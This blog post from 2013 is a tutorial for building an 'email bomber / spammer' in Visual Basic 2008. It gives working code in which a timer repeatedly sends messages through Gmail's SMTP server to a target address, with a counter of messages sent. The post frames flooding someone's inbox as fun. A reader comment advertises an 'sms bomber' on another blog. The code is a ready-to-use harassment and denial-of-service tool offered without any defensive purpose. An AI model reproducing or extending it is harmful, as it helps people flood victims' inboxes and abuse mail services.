728x90 AdSpace

Latest News
Friday 1 March 2013

Make an Email bomber / Spammer in 5 mins with VB 2008 [TUTORIAL]





Download TutorialPassword
www.hamidashraf.blogspot.com

ok, so lets take care of the easy things first.

go to view ---> code
at the very top write this:

Code:
Imports System.Net.Mail
go back to the designer and
double click on the start button and write this:

Code:
Timer1.start()
double click on the stop button and write this:
Code:
Timer1.stop()
double click on the exit button and write this:
Code:
End
now your code view should look like this:


now for the fun part...
double click on the timer and enter this code:

Code:
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress(usernamebox.Text)
MyMailMessage.To.Add(tobox.Text)
MyMailMessage.Subject = (subjectbox.Text)
MyMailMessage.Body = messagebox.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(usernamebox.Text, passwordbox.text)
SMTPServer.EnableSsl = True
Label1.Text = Val(Label1.Text + 1)
SMTPServer.Send(MyMailMessage)
The full code should look like this:




Hit F5 and check it out. if all went good then your done.
play with the layout,colors,and icon copy the file from the projects debug folder and run it anytime you like.
this is a very simple bomber, you can continue to add things to it, but this should get you started.

Enjoy!!!
  • Blogger Comments
  • Facebook Comments

1 comments:

  1. nice ...........


    if anybody want to download 100 % working sms bomber so visit this blog


    http://onlinetraningsoftware.blogspot.com

    ReplyDelete

Item Reviewed: Make an Email bomber / Spammer in 5 mins with VB 2008 [TUTORIAL] Rating: 5 Reviewed By: Unknown